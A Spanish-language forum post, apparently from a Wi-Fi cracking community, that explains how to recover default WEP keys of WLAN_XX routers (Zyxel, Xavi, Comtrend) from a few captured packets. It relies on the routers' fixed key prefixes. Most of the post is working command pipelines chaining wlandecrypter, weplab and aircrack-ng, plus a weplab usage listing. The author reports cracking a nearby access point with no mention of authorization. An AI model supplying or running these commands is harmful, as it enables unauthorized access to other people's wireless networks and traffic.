En algunos casos quien haya usado en WlanDeCrypter de nilpOinter se habra encontrado que capturando pocos (a veces 1 solo) de los paquetes *CAP consigue romper el debil cifrado WEP/WPA de estos cacharros (key por defécto ¡ojo!)
Como sabemos, suponemos en las redes WLAN_XX que es donde se aplica el soft de RUSOBLANCO, la encriptación WEP esta basada en una seria fija dependiendo del modelo de Router
Zyxel = > Z001349
Xavi=>X00013 seguido de 6 digitos (la key oculta) generados por la propia MAC un total de 13 caracteres = > WEP 108/128 Bits.
El problema llega cuando despues de aplicar los comandos de WlanDeCrypter conocidos desde Linux o desde Windows, nos devuelve esos 6 bites a
FFFFFF *
Z001349FFFFFF ¡ESA KEY no es buena! las FFFFFF indican que no hay key en claro
La cosa desde
Linux tiene fácil arreglo; con el cmd...
wlandecrypter MAC WLAN_XX claves
aircrack-ng -b MAC -w claves ficherocapturas
esto ya esta comentado...
Pero y desde Windows?Pues tambien, acabo de hacer unas pruebas de un AP WLAN_XX que apenas me da siempre 2 o 3 *cap, y siempre me devuleve esas FFFFFF ¡bgrggggg!
Así que me lie a experimentar
El comando original que el autor nos presento era tal que así;
wlandecrypter.exe BSSID WLAN_XX | weplab --key 128 -y --bssid BSSID OUT.cap
a mi se me ocurrieron injertos como;
wlandecrypter.exe BSSID WLAN_XX | weplab --key 128 -y -K 128--bssid BSSID OUT.cap | aircrack-ng -b BSSID -w claves OUT.CAP
* claves = EL DIC del propio Wlandecripter (debes generarlo)
Pero finalemente el que me resolvio la papeleta fue;
wlandecrypter.exe BSSID WLAN_XX | weplab --key 128 -y -k 128 --bssid BSSID OUT.cap
Observando la sintaxis de weplab se me ocurrio simplemente indicarle -k el número de bit de la key
Usage: weplab [-a|-b|-r|-y|-c] [-k <keylength>] [extended options] <pcap file>
Modes:
-a analyze pcap file and show information
-y uses words (from stdin or wordfile) as wep keys
-b brute forces wep keys
-r uses statistical attacks to break the key
-c capture encrypted data packets from a wireless interface
-k [64|128] specifies 128 or 64 bits (default) key
-h, --help display help about extended options
A mi me acaba de funcionar, con los 3 paquetes donde me daba FFFFFF me da la key en claro, la combinancion de aircrack-ng es más fuerte aún, y no se yo si con la última versión "05" del WlanDecrypter alguno de los Router Zyxel, Xavvy e incluso los Comtrend se resistira...
* pd no me acuerdo de como generar el dic nativo del WlanDecrypter y lo pero es que lo he hecho en alguna ocasión